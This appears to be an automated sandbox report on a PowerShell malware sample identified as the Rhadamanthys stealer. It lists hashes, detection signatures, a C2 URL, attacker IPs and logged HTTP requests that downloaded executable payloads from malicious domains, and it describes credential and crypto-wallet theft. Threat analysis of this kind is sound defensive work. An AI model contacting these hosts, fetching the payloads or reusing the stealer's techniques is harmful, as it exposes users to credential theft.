Windows Analysis Report
test.ps1

Overview

General Information

Sample name: test.ps1
Analysis ID: 1529309
MD5: b629e4a76638f91a67059188d07e27f6
SHA1: 42b37211578e971c684b493c8b604874518652e3
SHA256: b4dabf844bceeb5b1fa448549735296b4bdf289f346f960228d52a7a09e35ea1
Tags: ps1, rocketdocs-lol, user-JAMESWT_MHT

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dllhost Internet Connection
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection

Source: test.ps1 Avira: detected
Source: 00000007.00000002.1527561302.0000000003121000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}
Source: C:\Users\Public\ajbs50ul.bat ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\oSyU.ini ReversingLabs: Detection: 45%
Source: test.ps1 ReversingLabs: Detection: 23%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.7:52142 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:52152 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52174 version: TLS 1.2
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbsAlarms^ source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbPX6 source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9440F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 3_2_00007FF79E9440F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then ret 7_2_1C0C10BC
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 4x nop then dec esp 14_2_00000203FE6C5641
Source: C:\Windows\System32\rekeywiz.exe Code function: 4x nop then dec esp 16_2_00000260AF595641

Networking

Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:49819
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:52140
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:52206
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.7:52242
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.196.9.174:7777 -> 192.168.2.7:52249
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.7:56563
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
Source: Malware configuration extractor URLs: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Source: unknown Network traffic detected: IP country count 13
Source: global traffic TCP traffic: 192.168.2.7:49769 -> 130.133.110.14:33445
Source: global traffic TCP traffic: 192.168.2.7:49770 -> 194.249.212.109:33445
Source: global traffic TCP traffic: 192.168.2.7:49819 -> 147.45.126.71:3752
Source: global traffic TCP traffic: 192.168.2.7:52242 -> 46.29.238.96:4872
Source: global traffic TCP traffic: 192.168.2.7:52249 -> 185.196.9.174:7777
Source: global traffic TCP traffic: 192.168.2.7:52252 -> 104.223.122.15:3389
Source: global traffic TCP traffic: 192.168.2.7:52253 -> 51.254.84.212:33445
Source: global traffic TCP traffic: 192.168.2.7:52255 -> 185.58.206.164:33445
Source: global traffic TCP traffic: 192.168.2.7:52256 -> 195.93.190.6:33445
Source: global traffic TCP traffic: 192.168.2.7:52258 -> 95.215.44.78:3389
Source: global traffic TCP traffic: 192.168.2.7:52259 -> 163.172.136.118:3389
Source: global traffic TCP traffic: 192.168.2.7:52261 -> 37.97.185.116:33445
Source: global traffic TCP traffic: 192.168.2.7:52262 -> 80.87.193.193:3389
Source: global traffic TCP traffic: 192.168.2.7:52263 -> 46.229.52.198:33445
Source: global traffic TCP traffic: 192.168.2.7:52264 -> 85.21.144.224:33445
Source: global traffic TCP traffic: 192.168.2.7:52265 -> 37.187.122.30:3389
Source: global traffic TCP traffic: 192.168.2.7:52266 -> 205.185.116.116:33445
Source: global traffic TCP traffic: 192.168.2.7:52267 -> 198.98.51.198:3389
Source: global traffic TCP traffic: 192.168.2.7:52268 -> 104.233.104.126:33445
Source: global traffic TCP traffic: 192.168.2.7:52272 -> 148.251.23.146:2306
Source: global traffic TCP traffic: 192.168.2.7:52274 -> 193.124.186.205:33445
Source: global traffic TCP traffic: 192.168.2.7:52138 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1 | Host: bemostake.space | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1 | Host: rocketdocs.lol | Connection: Keep-Alive
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.7:52140
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.7:52206
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138 (6 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.201.200 (5 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203 (1 occurrence)
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60 (38 occurrences)
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E947E00 recv,WSAGetLastError, 3_2_00007FF79E947E00
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1 | Host: bemostake.space | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1 | Host: rocketdocs.lol | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
